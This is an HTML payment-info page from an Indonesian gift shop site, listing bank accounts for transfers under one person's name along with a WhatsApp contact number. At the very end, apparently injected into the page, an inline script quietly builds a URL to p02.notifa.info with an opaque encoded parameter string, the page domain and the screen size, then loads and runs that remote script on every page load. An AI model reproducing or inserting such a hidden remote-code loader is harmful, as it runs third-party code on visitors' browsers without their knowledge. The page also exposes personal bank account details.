<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- The above 4 meta tags *must* come first in the head; any other head content must come *after* these tags-->
    <!-- Title-->
    <title>Udah Kadoin Aja! | Kado Untuk Semua Orang</title>
    <!-- Favicon-->
    <link rel="icon" href="img/core-img/favicon.png">
    <!-- Stylesheet-->
    <link rel="stylesheet" href="style.css">
  </head>
  <body>
    <!-- Preloader-->
    <div class="preloader" id="preloader">
      <div class="spinner-grow text-secondary" role="status">
        <div class="sr-only">Loading...</div>
      </div>
    </div>
    <!-- Header Area-->
    <div class="header-area" id="headerArea">
      <div class="container h-100 d-flex align-items-center justify-content-between">
        <!-- Back Button-->
        <div class="back-button" onclick="history.back()"><i class="lni-arrow-left"></i></div>
        <!-- Page Title-->
        <div class="page-heading">
          <h6 class="mb-0">Info Bank</h6>
        </div>
        <!-- Filter Option-->
        <a href="keranjang.html"><i class='lni lni-shopping-basket'></i></a>
      </div>
    </div>
    <div class="page-content-wrapper">
      <div class="container">
        <!-- Checkout Wrapper-->
        <div class="checkout-wrapper-area py-3">
          <div class="credit-card-info-wrapper"><img class="d-block mb-4" src="img/bg-img/12.png" alt="">
            <div class="bank-ac-info">
              <p></p>
              <ul class="list-group mb-3">
                <li class="list-group-item d-flex justify-content-between align-items-center">Nama Bank<span>BCA</span></li>
                <li class="list-group-item d-flex justify-content-between align-items-center">Nomor Rekening<span>0431296810</span></li>
                <li class="list-group-item d-flex justify-content-between align-items-center">Atas Nama<span>Eko Wahyudi</span></li>
              </ul>
              <ul class="list-group mb-3">
                <li class="list-group-item d-flex justify-content-between align-items-center">Nama Bank<span>BRI</span></li>
                <li class="list-group-item d-flex justify-content-between align-items-center">Nomor Rekening<span>0037-01-108755-50-2</span></li>
                <li class="list-group-item d-flex justify-content-between align-items-center">Atas Nama<span>Eko Wahyudi</span></li>
              </ul>
              <ul class="list-group mb-3">
                <li class="list-group-item d-flex justify-content-between align-items-center">Nama Bank<span>BNI</span></li>
                <li class="list-group-item d-flex justify-content-between align-items-center">Nomor Rekening<span>0469232575</span></li>
                <li class="list-group-item d-flex justify-content-between align-items-center">Atas Nama<span>Eko Wahyudi</span></li>
              </ul>
              <ul class="list-group mb-3">
                <li class="list-group-item d-flex justify-content-between align-items-center">Nama Bank<span>Mandiri</span></li>
                <li class="list-group-item d-flex justify-content-between align-items-center">Nomor Rekening<span>1580004313284</span></li>
                <li class="list-group-item d-flex justify-content-between align-items-center">Atas Nama<span>Eko Wahyudi</span></li>
              </ul>
          </div>
        </div>
      </div>
    </div>
    <!-- Footer Nav-->
    <div class="footer-nav-area" id="footerNav">
      <div class="suha-footer-nav h-100">
        <ul class="h-100 d-flex align-items-center justify-content-between">
          <li><a href="index.html"><i class="lni-home"></i>Home</a></li>
          <li><a href="eksplor.html"><i class="lni-grid-alt"></i>Eksplor</a></li>
          <li><a href="https://api.whatsapp.com/send?phone=628987088921&text=Hai%20kk%2C%20saya%20mau%20tanyak%20seputar%20kado"><i class="lni-whatsapp"></i>Chat</a></li>
          <li><a href="notifikasi.html"><i class="lni-alarm lni-tada-effect"></i>Notifikasi</a></li>
          <li class="active"><a href="support.html"><i class="lni-question-circle"></i>Support</a></li>
        </ul>
      </div>
    </div>
    <!-- All JavaScript Files-->
    <script src="js/jquery.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/waypoints.min.js"></script>
    <script src="js/jquery.easing.min.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/jquery.animatedheadline.min.js"></script>
    <script src="js/jquery.counterup.min.js"></script>
    <script src="js/wow.min.js"></script>
    <script src="js/jarallax.min.js"></script>
    <script src="js/jarallax-video.min.js"></script>
    <script src="js/default/jquery.passwordstrength.js"></script>
    <script src="js/default/dark-mode-switch.js"></script>
    <script src="js/default/active.js"></script>
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncX53rUcRjz5xekSEbO1sPxaApwtg8WIozGiBExbDUBkWbH63QE1QUhhx%2boIEk5s3ivazpVvF5bQEiUm7FAV%2byLYlLZgKEQMbV66IMha3GXC%2bP0s2E3WMOiZZtVkPBPpMUfRudBws6CRTAeILa%2b5652C%2bcBl2MDWV%2fmaskB46LHH57daosfGzAanBSQ8XyumvQ5WBKDuHWxkZZiOZHH3ZNbbKxQCkS9d2F7RPQf%2fbEoWwOeCr1bwOMhD1QqnaC%2bR9A2kxqJ0tA19Ji%2fimy6HlJhdg2cHBdQRSSjo2yOZSlR59wVrfM6HJUT03rUqb8zWsr%2b4dKfcShLEtHemW3DnsUkDCzUCoWb8NhEJtYnv29wTa4Z%2fajNbYR0v75B6sjBCGQhexArcxLgkw4xKuiPINSTT5Za0SsJiGHLXQF%2bheKt6D3DIcNJcaUufuckyRt85LSMhLaa26YCTgy%2fY2reytoD%2flXE7gSU8Z5rLyrvGBWtI1E%2frEcSJvmM0w%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>